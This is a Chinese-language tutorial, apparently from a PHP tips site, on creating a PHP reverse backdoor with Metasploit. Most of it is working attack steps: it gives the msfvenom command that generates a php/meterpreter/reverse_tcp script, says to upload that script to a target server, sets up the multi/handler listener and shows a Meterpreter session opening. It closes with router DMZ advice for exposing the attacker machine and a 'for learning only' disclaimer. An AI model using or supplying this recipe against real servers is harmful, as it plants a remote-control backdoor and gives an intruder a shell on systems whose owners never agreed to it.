当前位置:首页 > PHP教程 > php高级应用 > 列表

metasploit框架PHP反向后门建立教程

发布:smiling 来源: PHP粉丝网  添加日期:2018-10-15 09:34:27 浏览: 评论:0 

Metasploit简介

灰帽黑客(第3版) Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户

metasploit框架PHP反向后门建立

  1. msfvenom -l  查看所有payload 
  2. Framework Payloads (436 total) 
  3. ============================== 
  4.     Name                                                Description 
  5.     ----                                                ----------- 
  6.     aix/ppc/shell_bind_tcp                              Listen for a connection and spawn a command shell 
  7.     aix/ppc/shell_find_port                             Spawn a shell on an established connection 
  8.     aix/ppc/shell_interact                              Simply execve /bin/sh (for inetd programs) 
  9.     aix/ppc/shell_reverse_tcp                           Connect back to attacker and spawn a command shell 

其他的省略。

这里要使用的是PHP反向后门

  1. msfvenom -p php/meterpreter/reverse_tcp --payload-options  查看参数 
  2. Options for payload/php/meterpreter/reverse_tcp: 
  3.  
  4.        Name: PHP Meterpreter, PHP Reverse TCP Stager 
  5.      Module: payload/php/meterpreter/reverse_tcp 
  6.    Platform: PHP 
  7.        Arch: php 
  8. Needs Admin: No 
  9.  Total size: 936 
  10.        Rank: Normal 
  11. Provided by: 
  12.     egypt <egypt@metasploit.com> 
  13. Basic options: 
  14. Name   Current Setting  Required  Description 
  15. ----   ---------------  --------  ----------- 
  16. LHOST                   yes       The listen address 
  17. LPORT  4444             yes       The listen port 
  18. Description: 
  19.   Run a meterpreter server in PHP. Reverse PHP connect back stager 
  20.   with checks for disabled functions 

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=1234 -f raw >c.php 生成脚本

生成后要将脚本最前面的注释符去掉,然后上传到目标服务器上

启动msf

use exploit/multi/handler

set PAYLOAD php/meterpreter/reverse_tcp

set LHOST 192.168.1.2

set LPORT 1234

exploit 启动监听

然后从浏览器中打开上传的脚本http://xxx.com/c.php

msf中就会看到

  1. *] Starting the payload handler... 
  2. [*] Sending stage (33068 bytes) to XXX.XXX.XXX.XXX 
  3. [*] Meterpreter session 1 opened (192.168.1.2:1234 -> xxx.xxx.xxx.xxx:42280) at 
  4. meterpreter > 

如果kali安装在虚拟机上,需要桥接,然后路由器上将kali DMZ到外网

注意:此教程只用于学习使用其它一切后果与本站无关。

Tags: metasploit PHP反向后门

分享到:

相关文章